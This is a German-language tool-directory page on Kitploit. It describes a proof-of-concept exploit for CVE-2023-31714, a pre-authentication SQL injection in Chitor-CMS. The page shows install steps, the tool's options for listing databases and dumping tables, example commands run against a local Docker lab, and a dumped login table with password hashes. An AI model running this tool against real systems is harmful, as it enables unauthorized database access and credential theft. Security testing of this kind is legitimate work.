Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-31714 — Proof-of-Concept-Exploit für CVE-2023-31714, eine SQL-Injection vor der Authentifizierung in Chitor-CMS < 1.1.2. Automatisiert die Datenbankaufzählung und das Extrahieren von Anmeldeinformationen über den Endpunkt /edit_school.php. | Kitploit
Tools/GitHubGitHub/msd0pe-1/cve-2023-31714
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsDatenbanksicherheit
GitHubmsd0pe-1/cve-2023-31714

CVE-2023-31714

Proof-of-Concept-Exploit für CVE-2023-31714, eine SQL-Injection vor der Authentifizierung in Chitor-CMS < 1.1.2. Automatisiert die Datenbankaufzählung und das Extrahieren von Anmeldeinformationen über den Endpunkt /edit_school.php.

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-31714 - Chitor-CMS < 1.1.2 Pre-Auth SQL Injection

Gefunden von msd0pe
https://github.com/waqaskanju/Chitor-CMS
Projekt von waqaskanju

chitor1.1.py (Gefixt seit Commit 69d3442)

2023/04/13
Eine SQL-Injection wurde im Endpunkt /edit_school.php?id= gefunden und benötigt keine Authentifizierung.

chitor1.0.py (Wurde ab Commit 5f76192 zu einer Post-Auth SQL-Injection)

2023/04/09
SQL-Injections wurden in mehreren Endpunkten wie /add_school_class.php?school= gefunden und benötigen keine Authentifizierung. Seit dem Commit 5f76192 überprüfen diese Endpunkte, ob der angemeldete Benutzer Bearbeitungsrechte hat. Diese Überprüfung war zuvor bereits vorhanden, aber nicht funktionsfähig.

Installation

root@kitploit:~
sudo apt install git virtualenv python3 python3-pip docker-compose
git clone https://github.com/msd0pe-1/cve-2023-31714
virtualenv -p python3 venv
source venv/bin/activate
pip3 install requests prettytable

TO START THE VULNERABLE DOCKER:
  - sudo ./run.sh [1.0|1.1]
TO STOP AND CLEAN THE DOCKER:
  - sudo ./clean.sh

Verwendung

root@kitploit:~
Usage: python chitor1.1.py [options]

Options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit
  -u URL, --url=URL     target url
  --dbs                 list databases
  -D DATABASE, --db=DATABASE
                        select a database
  --tables              list tables
  -T TABLE, --table=TABLE
                        select a table
  --dump                dump the content

  Beispiele:
    python3 chitor1.1.py -u http://127.0.0.1 --dbs
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
    python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump

  Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.
  Quellcode von msd0pe gemeinfrei gestellt, kein Copyright
  Jegliche böswillige oder illegale Aktivitäten können strafbar sein
  Verwendung auf eigene Gefahr

Beispiel

root@kitploit:~
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
+----+-------------+------------+----------------------------------+--------+
| Id | Employee_Id | User_Name  |             Password             | Status |
+----+-------------+------------+----------------------------------+--------+
| 1  |      1      |   Guest    | adb831a7fdd83dd1e2a309ce7591dff8 |   1    |
| 2  |      2      | waqaskanju | ################################ |   1    |
| 3  |      3      |   admin    | 21232f297a57a5a743894a0e4a801fc3 |   1    |
+----+-------------+------------+----------------------------------+--------+
Tool herunterladen